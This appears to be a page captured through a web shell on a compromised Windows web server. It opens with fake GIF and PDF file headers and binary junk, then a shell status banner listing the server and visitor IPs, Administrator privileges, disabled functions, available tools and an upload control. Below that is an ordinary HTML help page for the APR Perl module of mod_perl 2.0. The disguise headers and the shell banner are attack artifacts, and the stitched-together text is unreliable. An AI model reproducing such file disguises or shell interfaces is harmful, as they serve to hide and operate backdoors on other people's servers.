GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/JimMartinson/CST1611/VM_Data/Install/ApachePerlFiles/Perl/html/site/lib/ |
Upload File : |
<?xml version="1.0" ?> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <!-- saved from url=(0017)http://localhost/ --> <script language="JavaScript" src="../../displayToc.js"></script> <script language="JavaScript" src="../../tocParas.js"></script> <script language="JavaScript" src="../../tocTab.js"></script> <link rel="stylesheet" type="text/css" href="../../scineplex.css"> <title>APR - Perl Interface for Apache Portable Runtime (libapr and libaprutil Libraries)</title> <link rel="stylesheet" href="../../Active.css" type="text/css" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <link rev="made" href="mailto:" /> </head> <body> <!-- INDEX BEGIN --> <div name="index"> <script>writelinks('__top__',2);</script> <h1><a>APR - Perl Interface for Apache Portable Runtime (libapr and libaprutil Libraries)</a></h1> <p><a name="__index__"></a></p> <ul> <li><a href="#name">NAME</a></li> <li><a href="#synopsis">Synopsis</a></li> <li><a href="#description">Description</a></li> <li><a href="#using_apr_modules_outside_mod_perl_2_0">Using APR modules outside mod_perl 2.0</a></li> <li><a href="#see_also">See Also</a></li> <li><a href="#copyright">Copyright</a></li> <li><a href="#authors">Authors</a></li> </ul> <hr name="index" /> </div> <!-- INDEX END --> <p> </p> <h1><a name="name">NAME</a></h1> <p>APR - Perl Interface for Apache Portable Runtime (libapr and libaprutil Libraries)</p> <p> </p> <hr /> <h1><a name="synopsis">Synopsis</a></h1> <pre> <span class="keyword">use</span> <span class="variable">APR</span> <span class="operator">();</span> </pre> <p> </p> <hr /> <h1><a name="description">Description</a></h1> <p>On load this modules prepares the APR enviroment (initializes memory pools, data structures, etc.)</p> <p>You don't need to use this module explicitly, since it's already loaded internally by all <code>APR::*</code> modules.</p> <p> </p> <hr /> <h1><a name="using_apr_modules_outside_mod_perl_2_0">Using APR modules outside mod_perl 2.0</a></h1> <p>You'd use the <code>APR::*</code> modules outside mod_perl 2.0, just like you'd use it with mod_perl 2.0. For example to get a random unique string you could call:</p> <pre> % perl -MAPR::UUID -le 'print APR::UUID->new->format'</pre> <p> </p> <hr /> <h1><a name="see_also">See Also</a></h1> <p><a href="../../docs/2.0/index.html">mod_perl 2.0 documentation</a>.</p> <p> </p> <hr /> <h1><a name="copyright">Copyright</a></h1> <p>mod_perl 2.0 and its core modules are copyrighted under The Apache Software License, Version 2.0.</p> <p> </p> <hr /> <h1><a name="authors">Authors</a></h1> <p><a href="../../about/contributors/people.html">The mod_perl development team and numerous contributors</a>.</p> </body> </html>